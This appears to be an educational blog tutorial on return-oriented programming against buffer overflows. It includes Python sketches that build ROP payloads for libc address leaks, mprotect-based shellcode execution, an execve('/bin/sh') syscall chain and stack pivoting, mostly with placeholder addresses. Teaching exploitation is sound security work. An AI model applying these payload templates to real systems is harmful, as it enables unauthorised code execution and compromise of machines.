Probably the most famous CWE in the world, buffer overflows can be exploited in numerous ways, one of those being return oriented programming. In this post, I will be explaining the different ways to exploit a buffer overflow with return oriented programming.
1. Prerequisites
As with many other binary exploitation techniques, knowing how assembly works is very useful. To follow what I explain in this post, you should be familiar with:
- Buffer overflows
- Registers, especially the stack pointer
- Function calls in assembly
- Pointers
2. Return oriented programming in a nutshell
Return oriented programming (ROP) is exactly what its name implies: programming by returning. Every call instruction in assembly does two things: it pushes the address of the next instruction onto the stack, and it sets the instruction pointer to the call target. Almost every call instruction is paired with a later ret instruction, which pops the value at the top of the stack and places it into the instruction pointer.
This is the core idea behind return oriented programming. If the attacker can change the return address that was placed on the stack, say with a buffer overflow, they can set the instruction pointer to whatever they want.
3. Gadgets
A common term in return oriented programming is gadgets. Gadgets are small pieces of code that end in a ret instruction. Here are a few examples; you can find these in any ELF binary.
Gadgets are used to create what is called a ROP chain.
3.1. Finding gadgets
In the above example, a tool was used to find the gadgets. Examples of such tools are ropper and ROPgadget.
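To give a feel for what such tools do, here is a minimal sketch of a gadget scanner. It only looks for the two-byte pattern "pop reg; ret" in raw bytes, which is a tiny fraction of what ropper or ROPgadget handle. The function name find_pop_ret is made up for this illustration, and the sample bytes are the tail of the __libc_csu_init disassembly shown in section 5.

```python
# Opcodes 0x58..0x5f encode "pop rax" .. "pop rdi"; 0xc3 encodes "ret".
POP_REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def find_pop_ret(code: bytes, base: int = 0):
    """Return (address, text) for every 'pop reg; ret' byte pair in code."""
    found = []
    for i in range(len(code) - 1):
        if 0x58 <= code[i] <= 0x5F and code[i + 1] == 0xC3:
            reg = POP_REGS[code[i] - 0x58]
            found.append((base + i, f"pop {reg}; ret"))
    return found


# 41 5e = pop r14, 41 5f = pop r15, c3 = ret, located at 0x400770.
sample = bytes([0x41, 0x5E, 0x41, 0x5F, 0xC3])
for addr, text in find_pop_ret(sample, base=0x400770):
    print(hex(addr), text)
```

The scanner starts at every byte offset rather than only at instruction boundaries, which is why it can find gadgets hidden in the middle of other instructions.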
4. ROP chains
A ROP chain is a series of gadgets that the attacker runs consecutively in order to modify registers or data in the stack, heap, or bss. ROP chains work because every gadget ends in a ret instruction: if two or more gadget addresses are placed on the stack, then when the first gadget finishes, its ret pops the next gadget address and execution continues there. Here’s an illustration of a ROP chain (source):
If you are still confused, go ahead and watch this video from LiveOverflow. I hope it helps.
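As a rough sketch of what a ROP chain looks like as bytes, the snippet below lays out three gadget addresses after some padding. Every address and the offset are hypothetical placeholders, not values from a real binary, and p64 is just a small helper defined here.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


# Hypothetical values for illustration only.
OFFSET_TO_RET = 40        # bytes from the buffer start to the saved return address
GADGET_1 = 0x400111       # e.g. "pop rdi; ret"
GADGET_2 = 0x400222       # e.g. "pop rsi; ret"
GADGET_3 = 0x400333       # wherever execution should end up

payload = b"A" * OFFSET_TO_RET
payload += p64(GADGET_1) + p64(0x1111)  # gadget 1 pops 0x1111, its ret pops GADGET_2
payload += p64(GADGET_2) + p64(0x2222)  # gadget 2 pops 0x2222, its ret pops GADGET_3
payload += p64(GADGET_3)
```

Each ret consumes one 8-byte entry, so the order of the entries in the payload is the order in which the gadgets run.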
5. Techniques to exploit ROP
By now you probably understand how ROP works and what ROP chaining is. That alone isn’t enough to get RCE though, so I will show you the techniques I know for exploiting with ROP.
1. Jumping to a function
Sometimes, instead of jumping to small pieces of code, jumping to an entire function can be useful. Since (almost) all functions end with a ret instruction, creating ROP chains is still possible.
2. Setting the function’s parameters
Most functions require parameters in order to work properly. However, the location in which the parameters are stored differs between 32-bit and 64-bit architectures (on x86 Linux):
- For 32-bit, the function parameters are stored on the stack, directly after the return address.
- For 64-bit, the first 6 function parameters are stored in registers, which are rdi, rsi, rdx, rcx, r8, and r9. If the function requires more than 6 parameters, the remaining parameters are stored on the stack.
3. The problem with 32-bit
When jumping to a function in a 32-bit binary, the parameters are stored on the stack. This can interfere with our ROP chain, because after the function returns, the next values on the stack are its parameters, which most likely are not valid addresses of executable code. However, there is a solution to this problem, which is to create a payload like this:
(function to return to) + (address where buffer overflow is located) + (function parameters)
With a payload like this, after the function is done executing, execution will return to the function where the buffer overflow is located. Then, we can exploit the buffer overflow again, and create a brand new ROP chain.
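The layout above can be sketched in a few lines. All addresses, the offset, and the argument values below are hypothetical and only show the ordering of the pieces.

```python
import struct


def p32(value: int) -> bytes:
    """Pack an integer as a little-endian 32-bit word."""
    return struct.pack("<I", value)


# Hypothetical values for illustration only.
OFFSET_TO_RET = 44         # bytes from the buffer start to the saved return address
FUNC = 0x08048420          # function to return to
VULN = 0x080485A6          # function that contains the buffer overflow
ARG1 = 0x0804A030          # first parameter of FUNC
ARG2 = 0x100               # second parameter of FUNC

payload = b"A" * OFFSET_TO_RET
payload += p32(FUNC)       # overwritten return address
payload += p32(VULN)       # where FUNC returns to when it is done
payload += p32(ARG1)       # FUNC reads its parameters from here
payload += p32(ARG2)
```

From the point of view of FUNC, the word right after its own address is its return address, and the words after that are its parameters.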
4. The problem with 64-bit
When jumping to a function in a 64-bit binary, the first 6 parameters are located in registers. Registers are not stored on the stack; they live inside the CPU. Because of this, we can’t use the buffer overflow directly to change the register values. However, like in 32-bit, there is a solution.
In most dynamically linked binaries compiled with gcc, there is a function called __libc_csu_init (binaries linked against glibc 2.34 or newer no longer contain it, so this applies to older toolchains). This function is sort of like a constructor for your entire program. You can learn more about it here. Let’s see if we can find any useful gadgets in this function.
0x0000000000400710 <+0>: push r15
0x0000000000400712 <+2>: push r14
0x0000000000400714 <+4>: mov r15,rdx
0x0000000000400717 <+7>: push r13
0x0000000000400719 <+9>: push r12
0x000000000040071b <+11>: lea r12,[rip+0x2006ee] # 0x600e10
0x0000000000400722 <+18>: push rbp
0x0000000000400723 <+19>: lea rbp,[rip+0x2006ee] # 0x600e18
0x000000000040072a <+26>: push rbx
0x000000000040072b <+27>: mov r13d,edi
0x000000000040072e <+30>: mov r14,rsi
0x0000000000400731 <+33>: sub rbp,r12
0x0000000000400734 <+36>: sub rsp,0x8
0x0000000000400738 <+40>: sar rbp,0x3
0x000000000040073c <+44>: call 0x400498 <_init>
0x0000000000400741 <+49>: test rbp,rbp
0x0000000000400744 <+52>: je 0x400766 <__libc_csu_init+86>
0x0000000000400746 <+54>: xor ebx,ebx
0x0000000000400748 <+56>: nop DWORD PTR [rax+rax*1+0x0]
0x0000000000400750 <+64>: mov rdx,r15
0x0000000000400753 <+67>: mov rsi,r14
0x0000000000400756 <+70>: mov edi,r13d
0x0000000000400759 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>: add rbx,0x1
0x0000000000400761 <+81>: cmp rbp,rbx
0x0000000000400764 <+84>: jne 0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>: add rsp,0x8
0x000000000040076a <+90>: pop rbx
0x000000000040076b <+91>: pop rbp
0x000000000040076c <+92>: pop r12
0x000000000040076e <+94>: pop r13
0x0000000000400770 <+96>: pop r14
0x0000000000400772 <+98>: pop r15
0x0000000000400774 <+100>: ret
It might seem like there isn’t much, but this function has a very important gadget. The pop r14 and pop r15 instructions both consist of two bytes. Let’s see what they are.
0x400770 <__libc_csu_init+96>: 0x41 0x5e
0x400772 <__libc_csu_init+98>: 0x41 0x5f
They both start with 0x41, but the second byte of each is what is really interesting. Let’s disassemble starting from those second bytes.
0x400771 <__libc_csu_init+97>: pop rsi
0x400773 <__libc_csu_init+99>: pop rdi
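Well that’s interesting. By skipping the 0x41 prefix byte, we now have two gadgets, both in a function that is almost always present, which allow us to control the first two parameters of a function. Note that the pop rsi at 0x400771 is followed by pop r15 before the ret, so that gadget consumes one extra value from the stack. For the other 4 parameters, gadgets such as these are quite rare, but functions that need 6 parameters are also not very common.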
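Here is a small sketch of how these two gadgets could be combined to call a function with two parameters. The gadget addresses come from the disassembly above; TARGET and the argument values are hypothetical, and call_two_args is a helper name made up for this example.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


POP_RDI = 0x400773         # pop rdi; ret            (inside pop r15)
POP_RSI_R15 = 0x400771     # pop rsi; pop r15; ret   (inside pop r14)
TARGET = 0x400600          # hypothetical function to call


def call_two_args(func: int, arg1: int, arg2: int) -> bytes:
    """Build a chain that sets rdi and rsi, then returns into func."""
    chain = p64(POP_RDI) + p64(arg1)
    chain += p64(POP_RSI_R15) + p64(arg2)
    chain += p64(0)        # junk value consumed by the extra pop r15
    chain += p64(func)
    return chain


chain = call_two_args(TARGET, 0x601000, 0x100)
```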
5.1. The problem with 64-bit, part 2
Later in this post, I will talk about calling mprotect. Before that, you need to know that mprotect takes 3 parameters, which are address, length, and prot. We just learned an easy way to control the first two parameters of a function using __libc_csu_init, but we haven’t controlled the third parameter, which is stored in the rdx register. There is actually a gadget we can use, also found in __libc_csu_init:
0x0000000000400750 <+64>: mov rdx,r15
0x0000000000400753 <+67>: mov rsi,r14
0x0000000000400756 <+70>: mov edi,r13d
0x0000000000400759 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>: add rbx,0x1
0x0000000000400761 <+81>: cmp rbp,rbx
0x0000000000400764 <+84>: jne 0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>: add rsp,0x8
0x000000000040076a <+90>: pop rbx
0x000000000040076b <+91>: pop rbp
0x000000000040076c <+92>: pop r12
0x000000000040076e <+94>: pop r13
0x0000000000400770 <+96>: pop r14
0x0000000000400772 <+98>: pop r15
0x0000000000400774 <+100>: ret
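Unlike other gadgets, this gadget is far from a ret instruction. Also, there are other things to be wary of, like the call instruction and the jne instruction. To get values into r15, r14, and r13 in the first place, jump to the pop sequence at +90 before jumping to +64. To pass the call, make r12 + rbx*8 point to a memory location that holds the address of code that returns right away (the call dereferences that location, so it needs a pointer to the code rather than the code itself). To pass the jne, set rbp to rbx + 1. Also, the add rsp, 0x8 and the six pops that follow consume 56 bytes of the stack before the final ret, so the chain needs padding there. Finally, note that mov edi, r13d only gives control of the lower 32 bits of rdi (the upper 32 bits are zeroed).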
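Putting those conditions together, a chain for this gadget might look like the sketch below. The two gadget addresses are taken from the disassembly above. HARMLESS_PTR is a hypothetical address of a memory location that holds a pointer to code which returns right away without changing rdi, rsi, or rdx; whether such a location exists depends on the binary. The function name ret2csu and the example arguments are also made up for this illustration.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


CSU_POP = 0x40076A         # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL = 0x400750        # mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]
HARMLESS_PTR = 0x600E48    # hypothetical: memory holding a pointer to code that just returns


def ret2csu(edi: int, rsi: int, rdx: int, next_ret: int) -> bytes:
    """Set edi, rsi and rdx through __libc_csu_init, then return to next_ret."""
    chain = p64(CSU_POP)
    chain += p64(0)              # rbx = 0, so the call reads the pointer at r12
    chain += p64(1)              # rbp = rbx + 1, so the jne is not taken
    chain += p64(HARMLESS_PTR)   # r12
    chain += p64(edi)            # r13 -> edi (lower 32 bits only)
    chain += p64(rsi)            # r14 -> rsi
    chain += p64(rdx)            # r15 -> rdx
    chain += p64(CSU_CALL)
    chain += p64(0) * 7          # add rsp,8 plus six pops = 56 bytes of filler
    chain += p64(next_ret)
    return chain


chain = ret2csu(0x601000, 0x1000, 7, 0x400600)
```

If the full 64 bits of rdi are needed, a pop rdi gadget can be placed in next_ret's position, followed by the real target.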
Now that you can control the first three parameters of a function, you can call functions like mprotect, execve, fgets and more. But of course, calling those functions requires knowing their respective addresses.
6. Leaking addresses
Now that we know the basics, let’s try to create an arbitrary read.
I expect that you, the reader, already know about ASLR; if you don’t, go and have a read. ASLR is active by default on most machines, and by default it randomizes stack, heap, and libc addresses. However, the addresses of executable code and bss are only randomized if the PIE protection is enabled. For some binaries, this protection is disabled, which gives us known addresses for ROP gadgets, the Global Offset Table (GOT) and the Procedure Linkage Table (PLT). If you don’t know about GOT and PLT, here is a video from LiveOverflow that you can watch.
Most binaries have a way to print text onto the screen. This can be done with functions such as puts, printf, or even write. In any case, these functions can be used to print data from (almost) any address in the binary. Using a ROP chain, we can abuse this in order to get libc and/or stack addresses.
Here’s an example. In this binary we have a buffer overflow and we can change the return address. I’ll set the return address to the address of the puts PLT entry, and I’ll set the first parameter to the address of the puts GOT entry.
Boom, we got a libc address, more specifically the address of puts. Now we can subtract the offset of puts within libc to get the libc base, add the offset of system to get its address, and eventually get a shell.
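The calculation can be sketched as follows. The two offsets and the leaked bytes are hypothetical; real offsets depend on the exact libc build on the target. parse_leak is a helper name made up for this example, and it assumes the leak was printed by puts, which stops at the first null byte and appends a newline.

```python
import struct

# Hypothetical offsets; look them up in the target's actual libc.
PUTS_OFFSET = 0x84420
SYSTEM_OFFSET = 0x52290


def parse_leak(raw: bytes) -> int:
    """Turn the bytes printed by puts into a 64-bit address."""
    if raw.endswith(b"\n"):
        raw = raw[:-1]                      # drop the newline added by puts
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]


# Hypothetical output received after calling puts(puts@got).
leak = bytes.fromhex("2044e5f7ff7f") + b"\n"

puts_addr = parse_leak(leak)
libc_base = puts_addr - PUTS_OFFSET
system_addr = libc_base + SYSTEM_OFFSET

# A page-aligned base is a quick sanity check that the offsets match.
assert libc_base & 0xFFF == 0
print(hex(libc_base), hex(system_addr))
```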
7. Shellcoding
Almost every binary has the W^X protection. This prevents memory from being both writable and executable, so new executable code can’t be written during runtime. However, certain functions in libc can change the permissions of a block of memory, one of these functions being mprotect. mprotect takes three parameters, which are address, length, and prot. Since we can effectively control the first three function parameters, we can call this function and change the permissions of certain blocks of memory.
Here’s an example. In this binary I’ll change the bss area from rw- to rwx. Then, by using functions like fgets, we can write shellcode to that area and jump to it.
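One detail worth keeping in mind is that mprotect expects a page-aligned address. The sketch below computes the three arguments for a hypothetical bss address, assuming 4 KiB pages. BSS_ADDR and the helper name page_align are made up for this example.

```python
PAGE_SIZE = 0x1000                          # assumes 4 KiB pages
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4  # values from <sys/mman.h> on Linux

BSS_ADDR = 0x601060                         # hypothetical address inside bss


def page_align(addr: int) -> int:
    """Round an address down to the start of its page."""
    return addr & ~(PAGE_SIZE - 1)


# The values to place in rdi, rsi and rdx before returning into mprotect.
mprotect_args = (
    page_align(BSS_ADDR),
    PAGE_SIZE,
    PROT_READ | PROT_WRITE | PROT_EXEC,
)
print([hex(a) for a in mprotect_args])
```

The prot value 7 is simply rwx expressed as a bitmask.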
8. One gadget RCE
The previous tricks both required the attacker to set up function parameters before calling the functions. But as it turns out, there are certain pieces of code located in libc that can be used to invoke a shell without having to set any function parameters. However, there are certain constraints that must be satisfied before being able to use them. The constraints usually consist of setting up registers and memory locations in a certain way.
To find these gadgets, a tool called one_gadget can be used. Here’s an example of me using one_gadget:
9. Static binaries
In some cases, binaries will be compiled statically instead of dynamically. As a result, PIE is usually not enabled (at least for nasm), but certain libc functions such as system may not be available, because only the code the program actually uses gets linked in.
In this case, there are two things I like to do: call the function _dl_make_stack_executable, or invoke a syscall using only gadgets.
9.1. _dl_make_stack_executable
In statically linked binaries, there is a certain function called _dl_make_stack_executable. This function calls mprotect to make the stack rwx, but it requires two conditions to be satisfied. Let’s look at the disassembly:
0x00000000004717e0 <+0>: mov rsi,QWORD PTR [rip+0x250a49] # 0x6c2230 <_dl_pagesize>
0x00000000004717e7 <+7>: push rbx
0x00000000004717e8 <+8>: mov rbx,rdi
0x00000000004717eb <+11>: mov rax,QWORD PTR [rdi]
0x00000000004717ee <+14>: mov rdi,rsi
0x00000000004717f1 <+17>: neg rdi
0x00000000004717f4 <+20>: and rdi,rax
0x00000000004717f7 <+23>: cmp rax,QWORD PTR [rip+0x24f78a] # 0x6c0f88 <__libc_stack_end>
0x00000000004717fe <+30>: jne 0x47181f <_dl_make_stack_executable+63>
0x0000000000471800 <+32>: mov edx,DWORD PTR [rip+0x24f7da] # 0x6c0fe0 <__stack_prot>
0x0000000000471806 <+38>: call 0x435690 <mprotect>
0x000000000047180b <+43>: test eax,eax
0x000000000047180d <+45>: jne 0x471826 <_dl_make_stack_executable+70>
0x000000000047180f <+47>: mov QWORD PTR [rbx],0x0
0x0000000000471816 <+54>: or DWORD PTR [rip+0x2509f3],0x1 # 0x6c2210 <_dl_stack_flags>
0x000000000047181d <+61>: pop rbx
0x000000000047181e <+62>: ret
0x000000000047181f <+63>: mov eax,0x1
0x0000000000471824 <+68>: pop rbx
0x0000000000471825 <+69>: ret
0x0000000000471826 <+70>: mov rax,0xffffffffffffffc0
0x000000000047182d <+77>: pop rbx
0x000000000047182e <+78>: mov eax,DWORD PTR fs:[rax]
This is a 64-bit executable, so the function parameters are stored in registers. Looking carefully, it seems that if rdi is set to the address of __libc_stack_end (so that the value read from [rdi] passes the cmp at +23) and if __stack_prot is set to 7 (rwx), we can get a call to mprotect.
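A chain that satisfies both conditions could be sketched like this. The function and variable addresses come from the disassembly above. All five gadget addresses are hypothetical, including the assumption that the binary contains a usable memory-write gadget and a jmp rsp, and the shellcode is only a one-byte placeholder.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


# Taken from the disassembly above.
DL_MAKE_STACK_EXECUTABLE = 0x4717E0
LIBC_STACK_END = 0x6C0F88    # address of the __libc_stack_end variable
STACK_PROT = 0x6C0FE0        # address of the __stack_prot variable

# Hypothetical gadget addresses; find real ones with ropper or ROPgadget.
POP_RDI = 0x401111           # pop rdi; ret
POP_RAX = 0x402222           # pop rax; ret
POP_RDX = 0x403333           # pop rdx; ret
WRITE_RDX_RAX = 0x404444     # mov qword ptr [rdx], rax; ret
JMP_RSP = 0x405555           # jmp rsp

SHELLCODE = b"\xcc"          # placeholder (int3), not real shellcode

chain = b""
# Condition 1: __stack_prot = 7 (rwx)
chain += p64(POP_RAX) + p64(7)
chain += p64(POP_RDX) + p64(STACK_PROT)
chain += p64(WRITE_RDX_RAX)
# Condition 2: rdi = &__libc_stack_end
chain += p64(POP_RDI) + p64(LIBC_STACK_END)
chain += p64(DL_MAKE_STACK_EXECUTABLE)
# The stack is now executable, so jump to the bytes that follow on it.
chain += p64(JMP_RSP) + SHELLCODE
```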
9.2. Syscall gadgets
The other trick I like to do is to create a ROP chain that invokes a syscall directly. In 64-bit, this means I have to set rax, rdi, and rsi (plus rdx for syscalls with a third argument, such as execve) and then jump to a syscall instruction. In 32-bit, I have to set eax, ebx, and ecx (plus edx for a third argument) and then jump to an int 0x80 instruction. This may seem hard, but it’s actually easier than calling _dl_make_stack_executable.
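As an illustration, here is a sketch of a 64-bit chain for execve("/bin/sh", NULL, NULL). The syscall number 59 is the x86-64 Linux number for execve. Every gadget address is hypothetical, and BIN_SH assumes the string "/bin/sh" already sits at a known address (for example, written into bss by an earlier chain).

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


SYS_EXECVE = 59              # execve on x86-64 Linux (11 on 32-bit x86)

# Hypothetical addresses for illustration only.
POP_RAX = 0x401001           # pop rax; ret
POP_RDI = 0x401002           # pop rdi; ret
POP_RSI = 0x401003           # pop rsi; ret
POP_RDX = 0x401004           # pop rdx; ret
SYSCALL = 0x401005           # syscall
BIN_SH = 0x6C1000            # address of a "/bin/sh" string in memory

chain = b""
chain += p64(POP_RAX) + p64(SYS_EXECVE)  # rax = syscall number
chain += p64(POP_RDI) + p64(BIN_SH)      # rdi = path
chain += p64(POP_RSI) + p64(0)           # rsi = argv (NULL)
chain += p64(POP_RDX) + p64(0)           # rdx = envp (NULL)
chain += p64(SYSCALL)
```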
10. Stack pivoting
The last trick I will be explaining is stack pivoting. What we perceive as the “stack” is actually just an abstract concept: it is simply the area of memory that the stack pointer points to. If we can change the value of the stack pointer to point to a different location in memory, then that new location becomes the “stack”.
What good does this do for us? Well, in some binaries the ROP chain we can write is limited in length, say 2-3 entries at a time. In this case, for 64-bit binaries, changing rdi and jumping to puts and back to main won’t be possible.
But what if we could write a long chain in a different location? Say, bss? Or maybe even the heap? To be able to use this location as a ROP chain, we need to set the stack pointer to point to it. We could try to find an instruction like mov rsp, rax, but it’s almost never present in dynamically linked binaries.
Instead of generic instructions like that, we can use an unexpected one: leave. According to the Nasm docs, leave does two things: mov esp, ebp and then pop ebp (rsp and rbp in 64-bit).
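As you know, the saved base pointer is located right before the return address on the stack, so we can corrupt it every time we corrupt the return address. The function’s own leave then loads our value into the base pointer. If, instead of jumping to a function, we return to another leave; ret gadget, that second leave copies the corrupted base pointer into the stack pointer, and we have pivoted the stack to another location in memory.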
Let’s look at an example. In this binary, I’ve created a ROP chain in the heap and have also gotten a heap leak. I’m going to pivot the stack onto the heap and get a longer ROP chain.
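The overflow payload for such a pivot can be sketched as below. It assumes the vulnerable function ends with leave; ret, that only the saved base pointer and the return address can be overwritten, and that the long chain is already stored at a known address. The offset, the gadget address, and the chain address are all hypothetical, as is the helper name pivot_payload.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


# Hypothetical values for illustration only.
OFFSET_TO_SAVED_RBP = 32     # bytes from the buffer start to the saved rbp
LEAVE_RET = 0x400700         # leave; ret
CHAIN_ADDR = 0x602010        # leaked address where the long chain begins


def pivot_payload(chain_addr: int) -> bytes:
    """Overwrite saved rbp and the return address to pivot onto chain_addr."""
    # The gadget's leave sets rsp = rbp and then pops 8 bytes into rbp,
    # so rsp ends up at rbp + 8. Point rbp 8 bytes before the chain.
    fake_rbp = chain_addr - 8
    return b"A" * OFFSET_TO_SAVED_RBP + p64(fake_rbp) + p64(LEAVE_RET)


payload = pivot_payload(CHAIN_ADDR)
```

After the gadget's ret, execution continues with the first entry of the chain at CHAIN_ADDR, and every later ret keeps reading from the new location.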
11. Final words
In conclusion, ROP is a very powerful exploitation technique. This isn’t the end for ROP, as there are still techniques such as ret2dl_resolve, SROP, and more.